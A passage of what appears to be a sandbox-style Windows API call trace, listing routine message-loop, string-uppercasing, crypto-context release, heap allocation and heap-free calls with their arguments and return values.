lpsz="SSA060070245B") returned 0xd [0200.686] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0200.686] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0200.686] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.686] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.686] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.686] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.686] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.686] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0200.687] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.687] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0200.687] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.687] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.687] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0200.687] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.687] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0200.687] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.687] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.687] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.687] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.687] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.687] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.687] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.687] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.687] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.688] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.688] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.688] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.688] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.688] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.688] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.688] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0200.688] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.688] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0200.688] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.688] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.688] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.688] CryptReleaseContext (hProv=0xad63f8, dwFlags=0x0) returned 1 [0200.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0200.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0200.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0200.690] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.690] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0200.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.690] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.690] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.691] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0200.691] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0200.692] FreeLibrary (hLibModule=0x74d40000) returned 1 [0200.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0200.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.692] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0200.692] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0200.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.692] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0200.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0200.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0200.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0200.693] CloseHandle (hObject=0x268) returned 1 [0200.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0200.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0200.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0200.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0200.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0200.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0200.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0200.693] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0200.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0200.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0200.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0200.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0200.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0200.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0200.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0200.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0200.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0200.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa188 [0200.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.695] CloseHandle (hObject=0x1f8) returned 1 [0200.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0200.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0200.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0200.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0200.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0200.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0200.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0200.702] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0200.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0200.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0200.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0200.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0200.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0200.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0200.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x25c0000, 